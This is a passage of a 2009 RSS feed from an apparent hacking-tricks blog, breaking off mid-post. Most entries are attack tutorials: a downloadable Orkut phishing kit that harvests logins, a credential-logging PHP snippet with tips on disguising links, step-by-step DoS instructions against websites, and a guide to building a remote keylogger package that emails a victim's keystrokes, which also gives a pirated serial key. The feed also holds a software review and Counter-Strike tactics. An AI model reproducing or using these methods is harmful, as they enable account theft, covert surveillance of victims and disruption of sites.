url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWmuCdo5JBD-sr9rQ9Cpfc0bjLJeeDEEXLCEpeeKtgP_fYy_KktruZvYoLnvN-N3sILuh3CM2zjeud-6cSUciq7alqmg95HrkIxKWcm2Lhc4yJ6W2y3eri5Y-V3UfWKVpnfVBPSuA3W8M/s72-c/increase+speed.JPG" height="72" width="72"/><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-5264269747916729659</guid><pubDate>Thu, 10 Sep 2009 04:55:00 +0000</pubDate><atom:updated>2009-09-10T10:31:23.878+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><category domain="http://www.blogger.com/atom/ns#">user request</category><title>User Request : Orkut Phishing</title><description>&lt;div&gt;Posting Method of Orkut Phishing in which victim will be joining community and you will be getting his login details&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Download :&lt;/div&gt;http://www.freeuploading.com/files/6g010IE/orkut_rar.php&lt;div&gt;&lt;img src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGF4mem8471HopwflbTRcmOGeUtyRXcrILDsk5T7d4qZWaDD8AFHDVspgano7FIOxRE7dDpHKlrCItOc6VjauuwgwbCvfOBXrNEKpbi3gexJoAW_eZItBCQ6awDAg5kyBPpagvRDVilbs/s400/orkutshouting.jpg&quot; style=&quot;float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 266px;&quot; border=&quot;0&quot; alt=&quot;&quot; id=&quot;BLOGGER_PHOTO_ID_5379699314457218018&quot; /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;This Folder Contains 4 Files -&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Index.html - clone of orkut login page&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Run.php - processing php file joins 1 community and stores login details&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;One Gif image&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;ld.txt - where login details will be saved&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Note Edit The Run.txt file.Change the community to make people join your community&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;..... $cmm = &quot;29504417&quot;; //Here Replace Ur Community Id&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;It also stores Login details Of the User&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;some instructions in easy language&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;1]Downlaod the folder&lt;/div&gt;&lt;div&gt;http://www.freeuploading.com/files/6g010IE/orkut_rar.php&lt;/div&gt;&lt;div&gt;2]Open Run.php with Notepad and edit it with your community no&lt;/div&gt;&lt;div&gt;3]Save the file and upload all the 4files on to a uploading website&lt;/div&gt;&lt;div&gt;4]Now just send the index.htm link by copying it frm your website&lt;/div&gt;&lt;div&gt;5]Once the victim logins into the fake login page u will get his info&lt;/div&gt;&lt;div&gt;6]Also victim will join your community automatically&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://thecounterhack.blogspot.com/2009/09/user-request-orkut-phishing.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGF4mem8471HopwflbTRcmOGeUtyRXcrILDsk5T7d4qZWaDD8AFHDVspgano7FIOxRE7dDpHKlrCItOc6VjauuwgwbCvfOBXrNEKpbi3gexJoAW_eZItBCQ6awDAg5kyBPpagvRDVilbs/s72-c/orkutshouting.jpg" height="72" width="72"/><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-8489587269517131840</guid><pubDate>Wed, 09 Sep 2009 11:04:00 +0000</pubDate><atom:updated>2009-09-09T16:46:35.697+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">user request</category><title>User Request : Overview Of Phishing</title><description>&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9qtTgRETW-sO3VwJWOSofbQ2y2iJNrCmo0KnrtNAJU5T46Blwo2mcQr8dVdnh97uPXI2z11sR3FlxtyHyuXHt99G0ZbOdWMJzdx2Uxg5YbWzHgFtMWB5B7dfKhbfgReBGk4KCQdIPDns/s1600-h/phishing-scammer.jpg&quot;&gt;&lt;img style=&quot;float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 300px; height: 400px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9qtTgRETW-sO3VwJWOSofbQ2y2iJNrCmo0KnrtNAJU5T46Blwo2mcQr8dVdnh97uPXI2z11sR3FlxtyHyuXHt99G0ZbOdWMJzdx2Uxg5YbWzHgFtMWB5B7dfKhbfgReBGk4KCQdIPDns/s400/phishing-scammer.jpg&quot; border=&quot;0&quot; alt=&quot;&quot; id=&quot;BLOGGER_PHOTO_ID_5379424967573947682&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Index:&lt;br /&gt;What is a phisher? - 101&lt;br /&gt;Making a T35 Account - 102&lt;br /&gt;Getting Web pages Source Code - 103&lt;br /&gt;Creating Phish File - 104&lt;br /&gt;How to fool people - 105&lt;br /&gt;------------------------&lt;br /&gt;What is a phisher? 101&lt;br /&gt;------------------------&lt;br /&gt;&lt;br /&gt;A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.&lt;br /&gt;&lt;br /&gt;--------------------------&lt;br /&gt;Making a T35 Account 102&lt;br /&gt;--------------------------&lt;br /&gt;&lt;br /&gt;In order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish).spam.com For example: myspace.spam.com Most likeley, it is taken so add numbers like 08, or 07.&lt;br /&gt;&lt;br /&gt;--------------------------------------&lt;br /&gt;Getting Web Pages Source Code 103&lt;br /&gt;--------------------------------------&lt;br /&gt;&lt;br /&gt;After you create that page, go to the website you will make a phisher for, I will use KHI ( http://www.forums.khinsider.com ) Make sure you are logged out and and attempt to post a message. You will get an error saying you must log-in. From tehre right-click the page, and click View Source. Copy and paste what has popped-up.&lt;br /&gt;&lt;br /&gt;------------------------&lt;br /&gt;Creating Phish File 104&lt;br /&gt;------------------------&lt;br /&gt;&lt;br /&gt;Once you have that copied, go to your T35 account. Click on &quot;New File&quot; Title it login.htm Then paste your Source Code you copied from 104. Save it.&lt;br /&gt;&lt;br /&gt;Now create another file, title it fhish.php And inside, paste this code:&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot;  style=&quot;color:#FFCC00;&quot;&gt;&lt;b&gt;Code:&lt;br /&gt;$value) {&lt;br /&gt; fwrite($handle, $variable);&lt;br /&gt; fwrite($handle, &quot;=&quot;);&lt;br /&gt; fwrite($handle, $value);&lt;br /&gt; fwrite($handle, &quot;\r\n&quot;);&lt;br /&gt;}&lt;br /&gt;fwrite($handle, &quot;\r\n&quot;);&lt;br /&gt;fclose($handle);&lt;br /&gt;exit;&lt;br /&gt;?&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The http://www.myspace.com is what the page goes to after the victim logs in, change that to what desired&lt;br /&gt;&lt;br /&gt;Save the file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher!&lt;br /&gt;&lt;br /&gt;-------------------------&lt;br /&gt;How to fool people - 105&lt;br /&gt;-------------------------&lt;br /&gt;What you do now is disguise your link. Use this code:&lt;br /&gt;Code:&lt;br /&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot;  style=&quot;color:#FFCC00;&quot;&gt;T35acount.spam.com/login.htm&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot;  style=&quot;color:#FFCC00;&quot;&gt;[url=xxx.spam.com]*real website name*.com/login.php[/url]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;You do the same for any forum!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Thank you for reading! Hope it helps! If i was missing something, or you have any questions, Mail me</description><link>http://thecounterhack.blogspot.com/2009/09/user-request-overview-of-phishing.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9qtTgRETW-sO3VwJWOSofbQ2y2iJNrCmo0KnrtNAJU5T46Blwo2mcQr8dVdnh97uPXI2z11sR3FlxtyHyuXHt99G0ZbOdWMJzdx2Uxg5YbWzHgFtMWB5B7dfKhbfgReBGk4KCQdIPDns/s72-c/phishing-scammer.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-986006927706187045</guid><pubDate>Sat, 05 Sep 2009 08:07:00 +0000</pubDate><atom:updated>2009-09-05T13:45:24.455+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><category domain="http://www.blogger.com/atom/ns#">tutorial</category><title>Crash Small Websites .</title><description>&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;Tools&lt;br /&gt;&lt;br /&gt;Port scanner &amp;amp; rDos&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.mediafire.com/?sharekey=7fcc5e5c82ff2dcbe62ea590dc5e5dbbe04e75f6e8ebb871&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HotSpotSheild Proxy!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://hotspotshield.com/&lt;br /&gt;&lt;br /&gt;Step One: First we need to find the websites IP Adress. This is very easy todo.&lt;br /&gt;&lt;br /&gt;Ok so say they URL is http://www.yoursite.com ok now that you have your URL open Up&lt;br /&gt;&lt;br /&gt;Cmd todo this press Start&gt;Run&gt;cmd Once you have CMD open you type ping&lt;br /&gt;&lt;br /&gt;http://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST&lt;br /&gt;&lt;br /&gt;REM&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxm6guYtxgUG81Ngk0ZYsv6xN-cY0wLlbaRLZtgkrLZRqzV7EArGf4Hbs-9XVamJgO7W1uTn7LKWW0DqsjnP32bnhPmWVHN9H5mM-AOe_Dyk-Ef1AEW_TcqjXfvnbZC9ccn5m9PoiY9ho/s1600-h/OgAAALTyyf57vFKNIYnPNM3FC5x3-5dcKHNcBWb-AiBP4ucVDpT019aHD-xWX7JWD7Xh-IkARCYHCBtIg8Uxi3ar1iYAm1T1UHIp_fmDO0BJecwP26KmL4Nb7qzo.jpg&quot;&gt;&lt;/a&gt;OVE HTTP:// AND ANY /&#39;s) &lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;img id=&quot;BLOGGER_PHOTO_ID_5377892903137291506&quot; style=&quot;DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 400px; CURSOR: hand; HEIGHT: 202px; TEXT-ALIGN: center&quot; alt=&quot;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijVee-iJqy9R87kZDDErDE0lp9fyDk3d5EiFJHm66LXadOyVfCZjRAbDm27BqCBe4uSG5IcjGl8VYkhncDVSfbbj1RyEAgvlDwLIyRhj58LsaMHvi8gH6dV9hgqpAznxNsTqXeY4aJ0-c/s400/OgAAALTyyf57vFKNIYnPNM3FC5x3-5dcKHNcBWb-AiBP4ucVDpT019aHD-xWX7JWD7Xh-IkARCYHCBtIg8Uxi3ar1iYAm1T1UHIp_fmDO0BJecwP26KmL4Nb7qzo.jpg&quot; border=&quot;0&quot; /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Step Two: Now we must test to see if port 80 is open (it usually is).&lt;br /&gt;This is very easy todo to Ok open up the port scanner you downloaded.&lt;br /&gt;Once in the port scanner type in your Victims ip that you got from step 1.&lt;br /&gt;It will ask you todo a range scan or a full scan (SELECT REANGE SCAN!) It will ask for&lt;br /&gt;conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and&lt;br /&gt;81 for highest hit enter than hit cap Y.&lt;br /&gt;[X] = Closed&lt;br /&gt;[X] Vulnerable = Open&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;img id=&quot;BLOGGER_PHOTO_ID_5377893405257068866&quot; style=&quot;DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 400px; CURSOR: hand; HEIGHT: 202px; TEXT-ALIGN: center&quot; alt=&quot;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyq3Md0p5k3nOyTBxIsu3tGUxzqNPmc70QdEkyw5AqbQgkrdBRdcpKo1IQz3GxMalymOe79m_rC4V4VgWi4j9bOkMuyTjcO1WaXQl5q3m0d2ap-LH20luB-a8qWP_fk2ZN2lc9UelOAn0/s400/OgAAALprFGH20ydZIKG_saojjkb0Ze4_pU3EI5UdOiSxkTUIT1u9OENCSG2wDZh3uI1ilqJo079vRFPgVAh8SnSd1DMAm1T1UITMW1dIhoc4CVMeiSGEhN5aBSwo.jpg&quot; border=&quot;0&quot; /&gt;&lt;/p&gt;&lt;/div&gt;Step Three ALMOST DONE:&lt;br /&gt;The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)&lt;br /&gt;If port 80 is open your on your way to crashing!!&lt;br /&gt;Ok open Up rDos that you download.&lt;br /&gt;Enter your victims ip that we got from step 1.&lt;br /&gt;It will ask you for the port to attack use port 80 that is why we scaned to make sure 80&lt;br /&gt;was open! If it is closed it will not work.&lt;br /&gt;Hit enter.. *=Flooding -=Crashed Or didn&#39;t connect!&lt;img id=&quot;BLOGGER_PHOTO_ID_5377893711436517426&quot; style=&quot;DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 400px; CURSOR: hand; HEIGHT: 202px; TEXT-ALIGN: center&quot; alt=&quot;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVqi_pfM2PslcTtngO7z2dWNVVa0omMQ0RsdZyaohCC8qDtKzIHyXMASnSC6WCpzRsg5PWm3-ZxaDpmQCTOGLs7vhmZFhUJRK0oT8wCX_LGoBvygQsWKOhdiNY4nd5jpKhp0dvRIaWFGs/s400/fefe.jpg&quot; border=&quot;0&quot; /&gt;&lt;br /&gt;&lt;p&gt;Regards&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг&lt;/p&gt;</description><link>http://thecounterhack.blogspot.com/2009/09/crash-small-websites.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijVee-iJqy9R87kZDDErDE0lp9fyDk3d5EiFJHm66LXadOyVfCZjRAbDm27BqCBe4uSG5IcjGl8VYkhncDVSfbbj1RyEAgvlDwLIyRhj58LsaMHvi8gH6dV9hgqpAznxNsTqXeY4aJ0-c/s72-c/OgAAALTyyf57vFKNIYnPNM3FC5x3-5dcKHNcBWb-AiBP4ucVDpT019aHD-xWX7JWD7Xh-IkARCYHCBtIg8Uxi3ar1iYAm1T1UHIp_fmDO0BJecwP26KmL4Nb7qzo.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-8996749977773792266</guid><pubDate>Tue, 01 Sep 2009 12:26:00 +0000</pubDate><atom:updated>2009-09-01T18:08:19.190+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">software reviews</category><title>Software Review &quot;GMDesk&quot;</title><description>&lt;div&gt;May be this is an old application but still for the people who dont know about this application here is some info about it&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;What is GMDesk?&lt;br /&gt;GMDesk is an application that lets you run Gmail, Google Calendar, Google Docs and Google Maps as a stand-alone application to do all your mail handling, calendar event reading etc with. No need to open it up in a web browser, or h&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJW4OXxioZxk4-FeRuiRyE7GdrfLfE_-jQkezv-zdzL_hO5nNh1kuNSrvY6k78j05il8oY8JkWLb-vAmnZDshFeLXUR1a2ZExqXulistHnhzfUONCDvz0RZ4-RXgvhsf3f1L_x5S2IzB4/s1600-h/3_gmdesk02.jpg&quot;&gt;&lt;img id=&quot;BLOGGER_PHOTO_ID_5376477175369655906&quot; style=&quot;FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 400px; CURSOR: hand; HEIGHT: 355px&quot; alt=&quot;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJW4OXxioZxk4-FeRuiRyE7GdrfLfE_-jQkezv-zdzL_hO5nNh1kuNSrvY6k78j05il8oY8JkWLb-vAmnZDshFeLXUR1a2ZExqXulistHnhzfUONCDvz0RZ4-RXgvhsf3f1L_x5S2IzB4/s400/3_gmdesk02.jpg&quot; border=&quot;0&quot; /&gt;&lt;/a&gt;ave it clutter your workspace.&lt;br /&gt;Fire up GMDesk, and just alt-tab (on Windows or Linux) or Cmd-tab (on Mac) to shift between this application and the other ones you are running.&lt;br /&gt;GMDesk offers an easy menu as well as keyboard shortcuts to switch between different Google services, and you can specify what default service you want the application to start with. It also supports Google Apps access as well.&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;source : Robert Nym&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Regards&lt;/div&gt;&lt;br /&gt;&lt;div&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;/div&gt;&lt;br /&gt;&lt;div&gt;нαck τнε нαckεг kгαck τнε kгαckεг&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;</description><link>http://thecounterhack.blogspot.com/2009/09/software-review-gmdesk.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJW4OXxioZxk4-FeRuiRyE7GdrfLfE_-jQkezv-zdzL_hO5nNh1kuNSrvY6k78j05il8oY8JkWLb-vAmnZDshFeLXUR1a2ZExqXulistHnhzfUONCDvz0RZ4-RXgvhsf3f1L_x5S2IzB4/s72-c/3_gmdesk02.jpg" height="72" width="72"/><thr:total>4</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-6598118721632219073</guid><pubDate>Sat, 29 Aug 2009 09:08:00 +0000</pubDate><atom:updated>2009-08-29T14:56:43.829+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Counter Strike</category><category domain="http://www.blogger.com/atom/ns#">strategies</category><category domain="http://www.blogger.com/atom/ns#">tips</category><title>Mapwise Strategy : De_Dust2</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3nt3J5cVgSxh_iSmn9xBLAg6qntpQIssmMOJ2A9dhf-DQDDlkKVqzoUFEjeFY1fdG-JwnosJ2GdoHVE_uESNkt1ko4VbOjwF9Dh64jrAR7ewU01NUzZRZ2VMk3G4OseLxYyGYvMcSb4Q/s1600-h/de_dust2.jpg&quot;&gt;&lt;img style=&quot;float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 400px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3nt3J5cVgSxh_iSmn9xBLAg6qntpQIssmMOJ2A9dhf-DQDDlkKVqzoUFEjeFY1fdG-JwnosJ2GdoHVE_uESNkt1ko4VbOjwF9Dh64jrAR7ewU01NUzZRZ2VMk3G4OseLxYyGYvMcSb4Q/s400/de_dust2.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5375314001100621474&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;Counter-Terrorist &lt;/strong&gt;(CT) Side:&lt;br /&gt;&lt;strong&gt;Pistol Round&lt;/strong&gt;: 2 B, 2 on SA watching SA, mid, and lower b, 1 watching LA close to bombsite on the ramp.&lt;br /&gt;&lt;strong&gt;A set up(3-1-1): &lt;/strong&gt;1 LA, 2 SA or platform, 1 b, 1 mid &lt;br /&gt;&lt;strong&gt;B set up(SA Open strat): &lt;/strong&gt;2 long a, 1 mid, 2 b &lt;br /&gt;&lt;strong&gt;C set up(2-1-2 or Strong B): &lt;/strong&gt;1 long a, 1 SA, 1 mid, 2 b &lt;br /&gt;&lt;br /&gt;Terrorist (T) Side: &lt;br /&gt;Player1: AK &lt;br /&gt;Player2: AK &lt;br /&gt;Player3: AK &lt;br /&gt;Player4: AWP or AK sometimes &lt;br /&gt;Player5: AWP &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Pistol Round&lt;/strong&gt;: Player1, Player2, Player3 Rush LA with flashes/grenades and the bomb. Player4 and Player5 delay up SA trying to flank and get rotators. &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Verge Strat&lt;/strong&gt;: Player5, Player4 pick mid, Player3, Player2, Player1 with AKs rush towards B. If AWPS get a pick take and hold B. If awpers don&#39;t get a pick then Player1, Player2, Player5 go SA, Player4 sneaks long, and Player3 watches for rotators in mid/lower b area. Make sure to smoke middle if the team ends up going to A.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Complexity Strat&lt;/strong&gt;: Player1 goes lower B, Player5 picks mid, 3 team members(Player3, Player2, and Player4) rush and take long. Leave the awper(Player4) in pit at LA, then Player3 and Player2 meet up with Player5 and go up SA and take A. Player1 hangs middle and gets rotators. Make sure to smoke middle if the team ends up going to A.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Spread Strat&lt;/strong&gt;: Player2, Player3, Player4, Player5 work A both LA and SA, Player1 goes B and try to get picks/rotators. &lt;br /&gt;&lt;br /&gt;2-3 Split A: 3 team members(1 awp, 2 AKs) take LA, while other team members smoke mid and come up SA. Plant A and cover bomb. Make sure to lay 2-3 smokes when crossing from LA to site.&lt;br /&gt;&lt;br /&gt;Note: You can also do full team rushes as well such as a B rush, B tunnels to mid rush, SA rush, or LA rush. These usually don&#39;t work that well against good teams though. I would advice using these on save rounds, deagle rounds, or on a team in which you know is weak at a certain position on the map. &lt;br /&gt;&lt;br /&gt;Common Map Locations&lt;br /&gt;Long A: This is the route to A bombsite going right out of T spawn and then threw the small tunnel with doors.&lt;br /&gt;Short A: This is the route to A bombsite going up middle out of spawn and then going up stairs into A bombsite. This is also known as cat or catwalk.&lt;br /&gt;Upper B: This is the part of the tunnels outside of B that connects to the B bomb site.&lt;br /&gt;Lower B: This is the part of the tunnels outside of B that connects to middle.&lt;br /&gt;Pit: This is the declined ramp at long A. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;source:counterstrikestrats&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;SILENT||AGGRESSION</description><link>http://thecounterhack.blogspot.com/2009/08/mapwise-strategy-dedust2.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3nt3J5cVgSxh_iSmn9xBLAg6qntpQIssmMOJ2A9dhf-DQDDlkKVqzoUFEjeFY1fdG-JwnosJ2GdoHVE_uESNkt1ko4VbOjwF9Dh64jrAR7ewU01NUzZRZ2VMk3G4OseLxYyGYvMcSb4Q/s72-c/de_dust2.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-5909534117748920238</guid><pubDate>Fri, 28 Aug 2009 11:19:00 +0000</pubDate><atom:updated>2009-08-28T21:37:34.699+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>Its Time For Keyloggers ! (step 1 of hacking)</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid1GAo6q5DV8NWD3CPBKBCGfKbe-8lpjv8YRXsprS6TwHiOIoR56Qa2x2EJtq4C8Mmrir5T_4MTAIJ5EHjf5m8omTc_aQsUVgCMNhdL7Oq6blxbO0DqJHB17QvADHNCb0GCRqgNBnr49k/s1600-h/ardamax_keylogger.jpg&quot;&gt;&lt;img style=&quot;float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 311px; height: 400px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid1GAo6q5DV8NWD3CPBKBCGfKbe-8lpjv8YRXsprS6TwHiOIoR56Qa2x2EJtq4C8Mmrir5T_4MTAIJ5EHjf5m8omTc_aQsUVgCMNhdL7Oq6blxbO0DqJHB17QvADHNCb0GCRqgNBnr49k/s400/ardamax_keylogger.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5374975858515906098&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Keylogers basically store all key strokes(could be password or anything typed)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Step 1 : &lt;a href=&quot;http://www.easy-share.com/1700470036/1700470036&quot;&gt; Download Ardamax Keylogger &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Tutorial :&lt;br /&gt;&lt;br /&gt;1) Now install this after installing you will find adramax icon in tray icons list&lt;br /&gt;&lt;br /&gt;2) Right click on that icon and select register with a key&lt;br /&gt;&lt;br /&gt;registration name is&lt;br /&gt;forumw&lt;br /&gt;and registration serial is&lt;br /&gt;JUTSORHVSCQQGUF&lt;br /&gt;&lt;br /&gt;3) Now right click and choose REMOTE INSTALLATION&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4) A wizard will comeup .. press next for 4 times&lt;br /&gt;&lt;br /&gt;5) then it will ask for updates , uncheck it&lt;br /&gt;&lt;br /&gt;6) Now click next , now give the self destruction date to next 3-2 months&lt;br /&gt;&lt;br /&gt;7) Now they will ask that send logs every : choose every 5 minutes&lt;br /&gt;&lt;br /&gt;8) deleivery method select it as email&lt;br /&gt;&lt;br /&gt;9) now click next now send to give here your own email id &lt;br /&gt;&lt;br /&gt;10) smtp host--&gt;press find&lt;br /&gt;&lt;br /&gt;11) Username : give anything as username and password now do next for 4 times ..&lt;br /&gt;&lt;br /&gt;12) You will get a message saying - : deplosive package made successfully&lt;br /&gt;&lt;br /&gt;13) Your htv.exe file will apear ..&lt;br /&gt;&lt;br /&gt;Send this file to the victim as soon as he double clicks it, you will get his keystrokes in every 5 mins in email id provided ..&lt;br /&gt;&lt;br /&gt;they may come in spam / junk ....... Happy hacking&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг</description><link>http://thecounterhack.blogspot.com/2009/08/its-time-for-keyloggers-step-1-of.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid1GAo6q5DV8NWD3CPBKBCGfKbe-8lpjv8YRXsprS6TwHiOIoR56Qa2x2EJtq4C8Mmrir5T_4MTAIJ5EHjf5m8omTc_aQsUVgCMNhdL7Oq6blxbO0DqJHB17QvADHNCb0GCRqgNBnr49k/s72-c/ardamax_keylogger.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-4323800051392321656</guid><pubDate>Mon, 24 Aug 2009 12:37:00 +0000</pubDate><atom:updated>2009-08-24T18:22:54.627+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>10 Deadly Scripts !</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqiTazmkMArEibP8gfngpl31Wvb7M3JZJnM2JhtDKYPKcxctyifG0FQfYzgUNwFJFiBWl9fnOUb_eNdbszffwICgVeHHlaXuh6s6sVhdcjoxSbWGqtuaRRuavmgbuuYj09asRa23TJHeo/s1600-h/DeadlyVirus_sm.jpg&quot;&gt;&lt;img style=&quot;float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 264px; height: 400px;&quot; 